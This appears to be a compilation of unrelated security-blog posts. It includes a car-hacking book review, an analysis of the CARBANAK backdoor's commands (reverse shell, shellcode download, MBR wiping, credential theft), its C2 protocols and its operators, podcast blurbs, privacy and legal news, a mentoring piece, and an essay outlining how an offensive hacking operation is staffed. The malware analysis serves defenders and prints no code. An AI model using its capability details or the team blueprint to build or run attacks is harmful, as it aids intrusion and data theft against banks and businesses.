So, a couple years ago, I thought I'd give Audible a try, and read (err, listen to) some Audiobooks. I was driving from LA to San Francisco, and picked up a fiction book (one of Terry Pratchett's books in the Tiffany Aching series). I hated it (the audio experience), but left Audible installed and my account active.

A few months ago, on a whim, I figured I'd try a non-fiction book. I picked up NOFX's book, "The Hepatitis Bathtub and Other Stories". It was read by the band members and it was super enjoyable to listen while walking and exercising! And, it turns out, Audible had been giving me credits for some reason, and I have like 15 free books or something that I've been consuming like crazy.

Since my real-life friends are sick of listening to me talk about all books I'm reading, I started amusing myself by posting mini-reviews on Facebook, which got some good feedback.

That got me thinking: writing book reviews is kinda fun!

Then a few days ago, I was talking to a publisher friend at Rocky Mountain books , and he mentioned how he there's a reviewer who they sent a bunch of books to, and who didn't write any reviews. My natural thought was, "wow, what a jerk!".

Then I remembered: I'd promised No Starch that I'd write about The Car Hacker's Handbook like two years ago, and totally forgot. Am I the evil scientist jerk?

So now, after re-reading the book, you get to hear my opinions. :)

Threat Models

I've never really written about a technical book before, at least, not to a technical audience. So bear with this stream-of-consciousness style. :)

I think my favourite part of the book is the layout. When writing a book about car hacking to a technical audience, there's always a temptation to start with the "cool stuff" - protocols, exploits, stuff like that. It's also easy to forget about the varied level of your audience, and to assume knowledge. Since I have absolutely zero knowledge about car hacking (or cars, for that matter; my proudest accomplishment is filling the washer fluid by the third try and pulling up to the correct side of the gas pumps), I was a little worried.

At my current job (and previous one), I do product security reviews. I go through the cycle of: "here's something you've never seen before: ramp up, become an expert, and give us good advice. You have one week". If you ever have to do this, here's my best advice: just ask the engineers where they think the security problems are. In 5 minutes of casual conversation, you can find all the problems in a system and look like a hero. I love engineers. :)

But what happens when the engineers don't have security experience, or take an adversarial approach? Or when you want a more thorough / complete review?

That's how I learned to make threat models! Threat models are simply a way to discover the "attack surface", which is where you need to focus your attention as a reviewer (or developer). If you Google the term, you'll find lots of technical information on the "right way" to make a threat model. You might hear about STRIDE (spoofing/tampering/repudiation/information disclosure/denial of service/escalation of privileges). When I tried to use that, I tended to always get stuck on the same question: "what the heck IS 'repudiation', anyways?".

But yeah, that doesn't really matter. I use STRIDE to help me come up with questions and scenarios, but I don't do anything more formal than that.

If you are approaching a new system, and you want a threat model, here's what you do: figure out (or ask) what the pieces are, and how they fit together. The pieces could be servers, processes, data levels, anything like that; basically, things with a different "trust level", or things that shouldn't have full unfettered access to each other (read, or write, or both).

Once you have all that figured out, look at each piece and each connection between pairs of pieces and try to think of what can go wrong. Is plaintext data passing through an insecure medium? Is the user authentication/authorization happening in the right place? Is the traffic all repudiatable (once we figure out what that means)? Can data be forged? Or changed?

It doesn't have to be hard. It doesn't have to match any particular standard. Just figure out what the pieces are and where things can go wrong. If you start there, the rest of a security review is much, much easier for both you and the engineers you're working with. And speaking of the engineers: it's almost always worth the time to work together with engineers to develop a threat model, because they'll remember it next time.

Anyway, getting back to the point: that's the exact starting point that the Car Hacker's Handbook takes! The very first chapter is called "Understanding Threat Models". It opens by taking a "bird's eye view" of a car's systems, and talking about the big pieces: the cellular receiver, the Bluetooth, the wifi, the "infotainment" console, and so on. All these pieces that I was vaguely aware of in my car, but didn't really know the specifics of.

It then breaks them down into the protocols they use, what the range is, and how they're parsed. For example, the Bluetooth is "near range", and is often handled by "Bluez". USB is, obviously, a cable connection, and is typically handled by udev in the kernel. And so on.

Then they look at the potential threats: remotely taking over a vehicle, unlocking it, stealing it, tracking it, and so on.

For every protocol, it looks at every potential threat and how it might be affected.

This is the perfect place to start! The authors made the right choice, no doubt about it!

(Sidenote: because the rule of comedy is that 3 references to something is funnier than 2, and I couldn't find a logical third place to mention it, I just want to say "repudiation" again.)

Protocols

If you read my blog regularly, you know that I love protocols. The reason I got into information security in the first place was by reverse engineering Starcraft's game protocol and implementing and documenting it (others had reversed it before, but nobody had published the information).

So I found the section on protocols intriguing! It's not like the olden days, when every protocol was custom and proprietary and weird: most of the protocols are well documented, and it just requires the right hardware to interface with it.

I don't want to dwell on this too much, but the book spends a TON of time talking about how to find physical ports, sniff protocols, understand what you're seeing, and figure out how to do things like unlock your doors in a logical, step-by-step manner. These protocols are all new to me, but I loved the logical approach that they took throughout the protocol chapters. For somebody like me, having no experience with car hacking or even embedded systems, it was super easy to follow and super informative!

It's good enough that I wanted to buy a new car just so I could hack it. Unfortunately, my accountant didn't think I'd be able to write it off as a business expense. :(

Attacks

After going over the protocols, the book moves to attacks. I had just taken a really good class on hardware exploitation, and many of the same principles applied: dumping firmware, reverse engineering it, and exploring the attack surfaces.

Not being a hardware guy, I don't really want to attempt to reproduce this part in any great detail. It goes into a ton of detail on building out a lab, exploring attack surfaces (like the "infotainment" system, vehicle-to-vehicle communication, and even using SDR (software defined radio) to eavesdrop and inject into the wireless communication streams).

Conclusion

So yeah, this book is definitely well worth the read!

The progression is logical, and it's an incredible introduction, even for somebody with absolutely no knowledge of cars or embedded systems!

Also: I'd love to hear feedback on this post! I'm always looking for new things to write about, and if people legitimately enjoy hearing about the books I read, I'll definitely do more of this!

Behind the CARBANAK Backdoor

In this blog, we will take a closer look at the powerful, versatile backdoor known as CARBANAK (aka Anunak). Specifically, we will focus on the operational details of its use over the past few years, including its configuration, the minor variations observed from sample to sample, and its evolution. With these details, we will then draw some conclusions about the operators of CARBANAK. For some additional background on the CARBANAK backdoor, see the papers by Kaspersky and Group-IB and Fox-It.

Technical Analysis

Before we dive into the meat of this blog, a brief technical analysis of the backdoor is necessary to provide some context. CARBANAK is a full-featured backdoor with data-stealing capabilities and a plugin architecture. Some of its capabilities include key logging, desktop video capture, VNC, HTTP form grabbing, file system management, file transfer, TCP tunneling, HTTP proxy, OS destruction, POS and Outlook data theft and reverse shell. Most of these data-stealing capabilities were present in the oldest variants of CARBANAK that we have seen and some were added over time.

Monitoring Threads

The backdoor may optionally start one or more threads that perform continuous monitoring for various purposes, as described in Table 1.  

Thread Name

Description

Key logger

Logs key strokes for configured processes and sends them to the command and control (C2) server

Form grabber

Monitors HTTP traffic for form data and sends it to the C2 server

POS monitor

Monitors for changes to logs stored in C:\NSB\Coalition\Logs and nsb.pos.client.log and sends parsed data to the C2 server

PST monitor

Searches recursively for newly created Outlook personal storage table (PST) files within user directories and sends them to the C2 server

HTTP proxy monitor

Monitors HTTP traffic for requests sent to HTTP proxies, saves the proxy address and credentials for future use

Table 1: Monitoring threads

Commands

In addition to its file management capabilities, this data-stealing backdoor supports 34 commands that can be received from the C2 server. After decryption, these 34 commands are plain text with parameters that are space delimited much like a command line. The command and parameter names are hashed before being compared by the binary, making it difficult to recover the original names of commands and parameters. Table 2 lists these commands.

Command Hash

Command Name

Description

0x0AA37987

loadconfig

Runs each command specified in the configuration file (see the Configuration section).

0x007AA8A5

state

Updates the state value (see the Configuration section).

0x007CFABF

video

Desktop video recording

0x06E533C4

download

Downloads executable and injects into new process

0x00684509

ammyy

Ammyy Admin tool

0x07C6A8A5

update

Updates self

0x0B22A5A7

 

Add/Update klgconfig (analysis incomplete)

0x0B77F949

httpproxy

Starts HTTP proxy

0x07203363

killos

Renders computer unbootable by wiping the MBR

0x078B9664

reboot

Reboots the operating system

0x07BC54BC

tunnel

Creates a network tunnel

0x07B40571

adminka

Adds new C2 server or proxy address for pseudo-HTTP protocol

0x079C9CC2

server

Adds new C2 server for custom binary protocol

0x0007C9C2

user

Creates or deletes Windows user account

0x000078B0

rdp

Enables concurrent RDP (analysis incomplete)

0x079BAC85

secure

Adds Notification Package (analysis incomplete)

0x00006ABC

del

Deletes file or service

0x0A89AF94

startcmd

Adds command to the configuration file (see the Configuration section)

0x079C53BD

runmem

Downloads executable and injects directly into new process

0x0F4C3903

logonpasswords

Send Windows accounts details to the C2 server

0x0BC205E4

screenshot

Takes a screenshot of the desktop and sends it to the C2 server

0x007A2BC0

sleep

Backdoor sleeps until specified date

0x0006BC6C

dupl

Unknown

0x04ACAFC3

 

Upload files to the C2 server

0x00007D43

vnc

Runs VNC plugin

0x09C4D055

runfile

Runs specified executable file

0x02032914

killbot

Uninstalls backdoor

0x08069613

listprocess

Returns list of running processes to the C2 server

0x073BE023

plugins

Change C2 protocol used by plugins

0x0B0603B4

 

Download and execute shellcode from specified address

0x0B079F93

killprocess

Terminates the first process found specified by name

0x00006A34

cmd

Initiates a reverse shell to the C2 server

0x09C573C7

runplug

Plugin control

0x08CB69DE

autorun

Updates backdoor

Table 2: Supported Commands

Configuration

A configuration file resides in a file under the backdoor’s installation directory with the .bin extension. It contains commands in the same form as those listed in Table 2 that are automatically executed by the backdoor when it is started. These commands are also executed when the loadconfig command is issued. This file can be likened to a startup script for the backdoor. The state command sets a global variable containing a series of Boolean values represented as ASCII values ‘0’ or ‘1’ and also adds itself to the configuration file. Some of these values indicate which C2 protocol to use, whether the backdoor has been installed, and whether the PST monitoring thread is running or not. Other than the state command, all commands in the configuration file are identified by their hash’s decimal value instead of their plain text name. Certain commands, when executed, add themselves to the configuration so they will persist across (or be part of) reboots. The loadconfig and state commands are executed during initialization, effectively creating the configuration file if it does not exist and writing the state command to it.

Figure 1 and Figure 2 illustrate some sample, decoded configuration files we have come across in our investigations.

Figure 1: Configuration file that adds new C2 server and forces the data-stealing backdoor to use it

Figure 2: Configuration file that adds TCP tunnels and records desktop video

Command and Control

CARBANAK communicates to its C2 servers via pseudo-HTTP or a custom binary protocol.

Pseudo-HTTP Protocol

Messages for the pseudo-HTTP protocol are delimited with the ‘|’ character. A message starts with a host ID composed by concatenating a hash value generated from the computer’s hostname and MAC address to a string likely used as a campaign code. Once the message has been formatted, it is sandwiched between an additional two fields of randomly generated strings of upper and lower case alphabet characters. An example of a command polling message and a response to the listprocess command are given in Figure 3 and Figure 4, respectively.

Figure 3: Example command polling message

Figure 4: Example command response message

Messages are encrypted using Microsoft’s implementation of RC2 in CBC mode with PKCS#5 padding. The encrypted message is then Base64 encoded, replacing all the ‘/’ and ‘+’ characters with the ‘.’ and ‘-’ characters, respectively. The eight-byte initialization vector (IV) is a randomly generated string consisting of upper and lower case alphabet characters. It is prepended to the encrypted and encoded message.

The encoded payload is then made to look like a URI by having a random number of ‘/’ characters inserted at random locations within the encoded payload. The malware then appends a script extension (php, bml, or cgi) with a random number of random parameters or a file extension from the following list with no parameters: gif, jpg, png, htm, html, php.

This URI is then used in a GET or POST request. The body of the POST request may contain files contained in the cabinet format. A sample GET request is shown in Figure 5.

Figure 5: Sample pseudo-HTTP beacon

The pseudo-HTTP protocol uses any proxies discovered by the HTTP proxy monitoring thread or added by the adminka command. The backdoor also searches for proxy configurations to use in the registry at HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings and for each profile in the Mozilla Firefox configuration file at %AppData%\Mozilla\Firefox\<ProfileName>\prefs.js.

Custom Binary Protocol

Figure 6 describes the structure of the malware’s custom binary protocol. If a message is larger than 150 bytes, it is compressed with an unidentified algorithm. If a message is larger than 4096 bytes, it is broken into compressed chunks. This protocol has undergone several changes over the years, each version building upon the previous version in some way. These changes were likely introduced to render existing network signatures ineffective and to make signature creation more difficult.

Figure 6: Binary protocol message format

Version 1

In the earliest version of the binary protocol, we have discovered that the message bodies that are stored in the <chunkData> field are simply XORed with the host ID. The initial message is not encrypted and contains the host ID.

Version 2

Rather than using the host ID as the key, this version uses a random XOR key between 32 and 64 bytes in length that is generated for each session. This key is sent in the initial message.

Version 3

Version 3 adds encryption to the headers. The first 19 bytes of the message headers (up to the <hdrXORKey2> field) are XORed with a five-byte key that is randomly generated per message and stored in the <hdrXORKey2> field. If the <flag> field of the message header is greater than one, the XOR key used to encrypt message bodies is iterated in reverse when encrypting and decrypting messages.

Version 4

This version adds a bit more complexity to the header encryption scheme. The headers are XOR encrypted with <hdrXORKey1> and <hdrXORKey2> combined and reversed.

Version 5

Version 5 is the most sophisticated of the binary protocols we have seen. A 256-bit AES session key is generated and used to encrypt both message headers and bodies separately. Initially, the key is sent to the C2 server with the entire message and headers encrypted with the RSA key exchange algorithm. All subsequent messages are encrypted with AES in CBC mode. The use of public key cryptography makes decryption of the session key infeasible without the C2 server’s private key.

The Roundup

We have rounded up 220 samples of the CARBANAK backdoor and compiled a table that highlights some interesting details that we were able to extract. It should be noted that in most of these cases the backdoor was embedded as a packed payload in another executable or in a weaponized document file of some kind. The MD5 hash is for the original executable file that eventually launches CARBANAK, but the details of each sample were extracted from memory during execution. This data provides us with a unique insight into the operational aspect of CARBANAK and can be downloaded here.

Protocol Evolution

As described earlier, CARBANAK’s binary protocol has undergone several significant changes over the years. Figure 7 illustrates a rough timeline of this evolution based on the compile times of samples we have in our collection. This may not be entirely accurate because our visibility is not complete, but it gives us a general idea as to when the changes occurred. It has been observed that some builds of this data-stealing backdoor use outdated versions of the protocol. This may suggest multiple groups of operators compiling their own builds of this data-stealing backdoor independently.

Figure 7: Timeline of binary protocol versions

*It is likely that we are missing an earlier build that utilized version 3.

Build Tool

Most of CARBANAK’s strings are encrypted in order to make analysis more difficult. We have observed that the key and the cipher texts for all the encrypted strings are changed for each sample that we have encountered, even amongst samples with the same compile time. The RC2 key used for the HTTP protocol has also been observed to change among samples with the same compile time. These observations paired with the use of campaign codes that must be configured denote the likely existence of a build tool.

Rapid Builds

Despite the likelihood of a build tool, we have found 57 unique compile times in our sample set, with some of the compile times being quite close in proximity. For example, on May 20, 2014, two builds were compiled approximately four hours apart and were configured to use the same C2 servers. Again, on July 30, 2015, two builds were compiled approximately 12 hours apart.

What changes in the code can we see in such short time intervals that would not be present in a build tool? In one case, one build was programmed to execute the runmem command for a file named wi.exe while the other was not. This command downloads an executable from the C2 and directly runs it in memory. In another case, one build was programmed to check for the existence of the domain blizko.net in the trusted sites list for Internet Explorer while the other was not. Blizko is an online money transfer service. We have also seen that different monitoring threads from Table 1 are enabled from build to build. These minor changes suggest that the code is quickly modified and compiled to adapt to the needs of the operator for particular targets.

Campaign Code and Compile Time Correlation

In some cases, there is a close proximity of the compile time of a CARBANAK sample to the month specified in a particular campaign code. Figure 8 shows some of the relationships that can be observed in our data set.

Campaign Code

Compile Date

Aug

7/30/15

dec

12/8/14

julyc

7/2/16

jun

5/9/15

june

5/25/14

june

6/7/14

junevnc

6/20/14

juspam

7/13/14

juupd

7/13/14

may

5/20/14

may

5/19/15

ndjun

6/7/16

SeP

9/12/14

spamaug

8/1/14

spaug

8/1/14

Figure 8: Campaign code to compile time relationships

Recent Updates

Recently, 64 bit variants of the backdoor have been discovered. We shared details about such variants in a recent blog post. Some of these variants are programmed to sleep until a configured activation date when they will become active.

History

The “Carbanak Group”

Much of the publicly released reporting surrounding the CARBANAK malware refers to a corresponding “Carbanak Group”, who appears to be behind the malicious activity associated with this data-stealing backdoor. FireEye iSIGHT Intelligence has tracked several separate overarching campaigns employing the CARBANAK tool and other associated backdoors, such as DRIFTPIN (aka Toshliph). With the data available at this time, it is unclear how interconnected these campaigns are – if they are all directly orchestrated by the same criminal group, or if these campaigns were perpetrated by loosely affiliated actors sharing malware and techniques.

FIN7

In all Mandiant investigations to date where the CARBANAK backdoor has been discovered, the activity has been attributed to the FIN7 threat group. FIN7 has been extremely active against the U.S. restaurant and hospitality industries since mid-2015.

FIN7 uses CARBANAK as a post-exploitation tool in later phases of an intrusion to cement their foothold in a network and maintain access, frequently using the video command to monitor users and learn about the victim network, as well as the tunnel command to proxy connections into isolated portions of the victim environment. FIN7 has consistently utilized legally purchased code signing certificates to sign their CARBANAK payloads. Finally, FIN7 has leveraged several new techniques that we have not observed in other CARBANAK related activity.

We have covered recent FIN7 activity in previous public blog posts:

The FireEye iSIGHT Intelligence MySIGHT Portal contains additional information on our investigations and observations into FIN7 activity.

Widespread Bank Targeting Throughout the U.S., Middle East and Asia

Proofpoint initially reported on a widespread campaign targeting banks and financial organizations throughout the U.S. and Middle East in early 2016. We identified several additional organizations in these regions, as well as in Southeast Asia and Southwest Asia being targeted by the same attackers.

This cluster of activity persisted from late 2014 into early 2016. Most notably, the infrastructure utilized in this campaign overlapped with LAZIOK, NETWIRE and other malware targeting similar financial entities in these regions.

DRIFTPIN

DRIFTPIN (aka Spy.Agent.ORM, and Toshliph) has been previously associated with CARBANAK in various campaigns. We have seen it deployed in initial spear phishing by FIN7 in the first half of 2016.  Also, in late 2015, ESET reported on CARBANAK associated attacks, detailing a spear phishing campaign targeting Russian and Eastern European banks using DRIFTPIN as the malicious payload. Cyphort Labs also revealed that variants of DRIFTPIN associated with this cluster of activity had been deployed via the RIG exploit kit placed on two compromised Ukrainian banks’ websites.

FireEye iSIGHT Intelligence observed this wave of spear phishing aimed at a large array of targets, including U.S. financial institutions and companies associated with Bitcoin trading and mining activities. This cluster of activity continues to be active now to this day, targeting similar entities. Additional details on this latest activity are available on the FireEye iSIGHT Intelligence MySIGHT Portal.

Earlier CARBANAK Activity

In December 2014, Group-IB and Fox-IT released a report about an organized criminal group using malware called "Anunak" that has targeted Eastern European banks, U.S. and European point-of-sale systems and other entities. Kaspersky released a similar report about the same group under the name "Carbanak" in February 2015. The name “Carbanak” was coined by Kaspersky in this report – the malware authors refer to the backdoor as Anunak.

This activity was further linked to the 2014 exploitation of ATMs in Ukraine. Additionally, some of this early activity shares a similarity with current FIN7 operations – the use of Power Admin PAExec for lateral movement.

Conclusion

The details that can be extracted from CARBANAK provide us with a unique insight into the operational details behind this data-stealing malware. Several inferences can be made when looking at such data in bulk as we discussed above and are summarized as follows:

  1. Based upon the information we have observed, we believe that at least some of the operators of CARBANAK either have access to the source code directly with knowledge on how to modify it or have a close relationship to the developer(s).
  2. Some of the operators may be compiling their own builds of the backdoor independently.
  3. A build tool is likely being used by these attackers that allows the operator to configure details such as C2 addresses, C2 encryption keys, and a campaign code. This build tool encrypts the binary’s strings with a fresh key for each build.
  4. Varying campaign codes indicate that independent or loosely affiliated criminal actors are employing CARBANAK in a wide-range of intrusions that target a variety of industries but are especially directed at financial institutions across the globe, as well as the restaurant and hospitality sectors within the U.S.

Startup Security Weekly #44 – Selling Ice to an Eskimo

Tarun Desikan of Banyan joins us alongside guest host Matt Alderman. In the news, negotiation mistakes that are hurting your deals, hiring re-founders, updates from Hexadite, Amazon, Sqrrl, and more on this episode of Startup Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode44 Visit https://www.securityweekly.com for all the latest episodes!

Startup Security Weekly #43 – Never Stop Believing

The six secrets to starting smart, a startup’s guide to protecting trade secrets, knowing what your customers value, and more articles for discussion. In the news, updates from Netskope, Yubikey, CybelAngel, and more on this episode of Startup Security Weekly!

Full Show Notes: https://wiki.securityweekly.com/SSWEpisode43 Visit https://www.securityweekly.com for all the latest episodes!

China Releases Draft Guidelines on Cross-Border Data Transfers Pursuant to the Cybersecurity Law

On May 27, 2017, the National Information Security Standardization Technical Committee of China published draft guidelines on cross-border transfers pursuant to the new Cybersecurity Law, entitled Information Security Technology – Guidelines for Data Cross-Border Transfer Security Assessment (the “Draft Guidelines”). The earlier draft, Measures for the Security Assessment of Outbound Transmission of Personal Information and Critical Data (the “Draft Measures”), requires network operators to conduct “security assessments” when they propose to transfer personal information and “important information” to places outside of China. These “security assessments” are essentially audits of the cybersecurity circumstances surrounding the proposed transfer that are intended to produce an assessment of the risk involved. If the assessment indicates that the risk is too high, the transfer must be terminated.

The Draft Guidelines, once finalized, are intended to establish norms for working requirements, methodology, content and the determination of conclusions for these “security assessments.” They recommend particular content for consideration during “security assessments,” such as the volume of information to be transferred, the political and legal environment in the place where the data recipient is located, and the security safeguard capabilities of both the transferor and the data recipient. At this time, the following observations can be made:

  • Very generally speaking, the Draft Measures appear to take a risk-based approach, meaning that an assessment of the overall risks associated with a cross-border transfer, and the likely outcomes thereof, rather than a formalistic “check the box” compliance approach, should be used to determine whether the transfer should proceed.
  • The Draft Guidelines appear intended, once finalized, to be a voluntary rather than compulsory document.
  • The “security assessments” would focus on two overall inquiries: (1) the legality and appropriateness of the proposed cross-border transfer, and (2) the controllability of the risks involved.
  • In addition to personal information, the Draft Measures would also impose restrictions on the cross-border transfer of “important information.” The Draft Measures define this term broadly as “information which is very closely related to national security, economic development and the societal and public interests.” The Draft Guidelines provide some specific possible examples of what might constitute “important information.”
  • The Draft Guidelines would introduce into the Cybersecurity Law’s implementation framework the concept of “sensitive personal information,” as well as the possibility of desensitizing this information using processing that removes or reduces the sensitive elements in the data.

The Draft Guidelines’ content and approach may change by the time they are finalized. The Draft Guidelines are open to comment from the general public until June 26, 2017.

Enterprise Security Weekly #48 – Making Everybody Mad

Paul and John discuss building an internal penetration testing team. In the news, automating all the things, Juniper Networks opens a software-defined security ecosystem, millions of devices are running out-of-date systems, Duo and McAfee join forces, and more in this episode of Enterprise Security Weekly!Full Show Notes: https://wiki.securityweekly.com/ES_Episode48Visit https://www.securityweekly.com for all the latest episodes!

Federal Court Imposes Record Fine on TV Provider for Do Not Call Violations

On June 5, 2017, an Illinois federal court ordered satellite television provider Dish Network LLC (“Dish”) to pay a record $280 million in civil penalties for violations of the FTC’s Telemarketing Sales Rule (“TSR”), the Telephone Consumer Protection Act (“TCPA”) and state law. In its complaint, the FTC alleged that Dish initiated, or caused a telemarketer to initiate, outbound telephone calls to phone numbers listed on the Do Not Call Registry, in violation of the TSR. The complaint further alleged that Dish violated the TSR’s prohibition on abandoned calls and assisted and facilitated telemarketers when it knew or consciously avoided knowing that telemarketers were breaking the law.

The court held, in a 475-page opinion, that Dish committed over 66 million TSR violations. Judge Sue Myerscough stated that Dish “created a situation in which unscrupulous sales persons used illegal practices to sell Dish Network programming any way they could.”

$168 million of the penalty was awarded to the federal government, the largest civil penalty obtained to date in a Do Not Call case. The remaining amount was awarded to the states of California, Illinois, North Carolina and Ohio. The court also ordered injunctive relief, requiring Dish to:

  • demonstrate that it and its primary retailers fully comply with the TSR’s Safe Harbor Provisions;
  • hire a telemarketing expert to ensure compliance; and
  • submit to bi-annual compliance verification by the government.

In a statement, Dish indicated its plans to appeal the judgment. Acting FTC Chairman Maureen Ohlhausen pointed to the court’s decision as evidence that “companies will pay a hefty price for violating consumers’ privacy with unwanted calls.”

European Commission Pushes for Greater EU Role in Cybersecurity

On June 7, 2017, the European Commission published a paper signalling the EU’s intention to increase its role in directing cybersecurity policy and responses across its member states. The increasing threat posed by cyber attacks is highlighted in the EU Commission’s Reflection Paper on the Future of European Defence, which builds its case for closer union in respect of defense efforts.

In the paper, the EU Commission cites how increasingly accessible technology has enabled the rapid rise of security threats, including cyber threats. It sets out three standards of cooperation:

  • Security and Defense Cooperation, under which the 27 post-Brexit EU Member States would simply cooperate on security and defense more frequently than in the past;
  • Shared Security and Defense, under which the 27 EU Member States would begin closer financial and operational integration with respect to security and defense measures; and
  • Common Defense and Security, under which solidarity and mutual assistance between EU Member States would become the default position on security and defense issues, and involving a common EU defense policy.

In common with the tone of the paper, the EU Commission suggests that common defense and security arrangements would allow the EU to coordinate responses to cyber attacks and facilitate greater information sharing, technological cooperation and joint doctrines on cyber threats.

The EU Commission also published a Communication that highlights the importance of launching a European Defense Fund without undue delay. The fund, aimed at countering the lack of defense cooperation between EU Member States, was backed by the Council of the European Union in 2016 and will include funding for cybersecurity projects.

Mentoring: On meeting your **Heroes**

Mentoring: On meeting your  **Heroes**

I put heroes in asterisks because none of us have paparazzi following us around. I regularly use Val Smith's quote about even the most popular infosec person is like being a famous bowler.  Except for rare exceptions, no one outside of our community knows who we are. I've broken into at least one company from every vertical and my neighbor just asks me to help configure his wifi.




This topic came up because the person I'm mentoring met "a famous infosec person" and the guy proceed to be a drunk dbag to him.  It ended up taking quite a bit of wind out of his sail to have someone he kinda looked up to bag on his current career state and talks he was working on.

When I first joined the army how I thought anyone with a "tower of power" (Expert Infantry Badge, Airborne, Air Assault) was an awesome, do no wrong, individual.  Shit, If someone has all this shit on their chest they must be badass right??!!
For more info on badges: https://en.wikipedia.org/wiki/Badges_of_the_United_States_Army

Well the Army does a great job of stacking the people you initially meet as being pretty decent individuals. I think most people think highly of their drill sergeants their entire life.  So the first few people I met that had these badges reaffirmed this belief.  Then I got out and met a few more and was completely let down at the quality of these people.  When I say let down, I mean defeated/totally bothered that these people didn't live up to the pedestal I had put them on. It REALLY bothered me.

What you learn is that in the military you get to wear a badge you earned at any point in your career your entire career.  So maybe as some point someone was awesome enough to earn a badge. This doesn't mean they are a great leader, still good at what the badge means they are good at or even a good person. It means at one point in time they met a criteria and earned a badge.

How does this relate to Infosec?

We are all humans and generally react poorly to any sort of fame.

A good chunk of us are introverts.

The "community" values exploits and clever hacks over being a good person or helping others.

We have people that 10 years later are still riding the vapor trails of some awesome shit they did but havent done anything else relevant since.  Some people have giant egos that only care about you if you are currently in the process of kissing their ass.  To be fair if people ARE kissing your ass its hard not get an ego but you have to work hard to check that shit at the door.

Remember we are famous bowlers?


What can you do?

Check your ego.

Stay Humble.

Help (mentor) others.

Always remember how you felt when that hero dissed you when you are someone else's hero.


-CG





Hack Naked News #128 – June 6, 2017

Exploiting Windows 10, mimicking Twitter users, vulnerabilities in new cars, security issues surrounding virtual personal assistants, and more. Jason Wood of Paladin Security joins us to discuss sniffing out spy tools with ridesharing cars on this episode of Hack Naked News!Full Show Notes: https://wiki.securityweekly.com/HNNEpisode128Visit http://www.securityweekly.com for all the latest episodes!

The Offensive Cyber Security Supply Chain

During the past few weeks some people asked me how to build a "cyber security offensive team". Since the recurring question I decided to write a little bit about my point of view and my past experiences on this topic without getting into details (no: procedures, methodologies, communication artifacts and skill set will be provided). 

Years ago a well skilled and malicious actor (let me call him hacker, even if I am perfectly aware this is not the right word) could launch a single and sophisticated attack able to hit significative infrastructures causing large and glaring damages.  Nowadays this scenario is (fortunately) more unlikely since cyber defense technology made huge steps ahead and public/private organizations are teamed in blue teams with cyber security experts. The most doubtful of my readers are probably thinking that offensive technology made a huge steps ahead as well, ad I perfectly agree with you ! However you might probably agree with me that attacks complexity is arising a lot, in fact years ago to perform a successfully cyber attack you didn't need intermediations such anonymizers, malware evasion techniques, fast flux, DGA and -- more generally speaking -- all the required techniques to trick (or illude) blue teams, since no blue teams (or very few of) were existing. My point here is pretty clear, while years ago a single hacker was enough to attack a structured system (for example: ICS, Governative Networks, or Network Corporation) nowadays if you really want to successfully create a cyber security "army" you need a structured group of people. Talented people are very important but not as they were during the past years. On my personal point of view talented people should move from technical operations to organizational operations. I'll try to better explain my point of view following the reading.

The question now gets pretty easy: "What that group does ? And ..  how should it be organized ?".
 A team is usually a group of people that works together in order to reach a common target. The target should be clear to every team member (if you want a performing team) and every team member should share the same team belief to get the tasks done -- in order to quickly reach out the targets.

The group of people making an "offensive cyber security group" is not a "team" (as mentioned before) but it is closed to be a software supply chain where everybody has specific tasks and different targets. Let me putting in this way, if your task is to build a PDF parsing library you don't need to know where your library will be used, since your target is to build a generic and reusable library. Someone could use your library for a nice "automatic invoice maker" or for "injecting malicious javascript into a PDF" and for you (the PDF library writer) nothing should change. For such a reason I would not call this "group of people": Offensive Cyber Security Team but rather Offensive Cyber Security Supply Chain (OCSSC). Every step of the supply chain is made by specific team.
  
As every supply chain, the OCSSC needs common rules, methodologies and best practices to be shared between the every stages such as:
- Communication Artifacts. What are the artifacts to be exchanged between the supply chain teams?
- Procedures. What are the global procedures that shall be followed between teams ? What the procedures needed intra-team ?
- Tools. What are the most useful tools to be used intra-team ? and what tools to be used extra-team ?
- Skill Sets. What are the skill sets needed for each team ? 
- Recovery procedure. What are the special procedure to recovery plan intra team ?

I am not going into that questions since my goal is not to help my readers in building an OCSSC but contrary is to alert blue teams that offensive people are getting day by day more structured and purposeful. However I will give a broad view on how the OCSSC should be made in 2017.

The following image shows 5 stages representing 5 different teams which shall collaborate together through well known artifacts.

Offensive Cyber Security Supply Chain


I call the first team the Hunters. This team should be able to find new exploitable vulnerabilities on common software. This team needs to have strong infiltrates into hacking community in order to eventually acquire 0Days from 3-parties and to have update and sharpy fuzzers. This team needs a private cloud with intensive computational resources for getting fuzzing to several parallel softwares. It gets feedbacks on how to "fuzz" from community and from the "DEV-stage" team which should indicate to the Hunters what is the most interesting software to investigate for vulnerabilities. On a real life this team could be the one who finds vulnerabilities like for example the infamous MS17-10.

I call the second team: DEV- Stage. This team is mainly made by developers. Aim of dev-stage is to develop droppers starting from exploits. In fact it takes exploits artifacts from the "Hunters" and arm the developed exploit kits and/or weponize the developed worm. The Staging team should be able to answer to the question: "How do I technically infect victims" ? The Dev-Stage gets two artifact as input: one from the Payload team suggesting what kind of dropping method do they need, and the other one from Intruders which will suggest the Staging team to focus more on "web" or more on "physical" or more on "dedicated devices" and son on. On real life this team could be the one who builds exploit kits and or dropping technology such as for example "ethernal blue".

I call the third team DEV- Payload. This team is mainly made by developers and software testers. Aim of DEV- Payload is to build the dropped payload. This team needs to take care about communications channels, system persistence, evasion techniques and extensibility. It gets artifacts from staging team in order to perform deep and well structured tests and feedbacks from Intruders which suggest what functionalities should be developed in order to reach the Intruder's target.  In the real life this team is the one who develops Malware (or RAT) such as for example: WannaCrypt0r or DoublePulsar.

I call the fourth team Intruders. Intruders are the ones who perform the first intrusion actions. This team gets as input artifacts such as: (1) the deployed dev-stage (for example the Exploit Kit to be implanted) and (2) the developed payload (for example the Malware to be dropped on target system). It also gets feedbacks from the social team getting suggestions on what website and/or infrastructure to be attacked. The intruders are not developers but mainly penetration testers people who get access to external sources (such as: public web sites or public infrastructures) and compromise them injecting the Dev-Stage artifacts. The intruders might need to build new infrastructure such as new websites, or new public resources in order to fully arm a target system. In the real life this team could be the one who infects public websites with Exploit Kits such as for example: Angler, Neutrino or Terror EK.

I call the fifth team The Socials. This team is mainly made by communicators, marketing people who are able to perform the following actions: on one site getting and giving light artifacts (A2l) from/to the hacking community in order to get persistence on it and on the other hand to attract targets to the prepared infrastructures (made by intruders). They give feedbacks to intruders in order to move their operations to what really is useful to attacked target. On real life this group is the most close to Human-Intel.

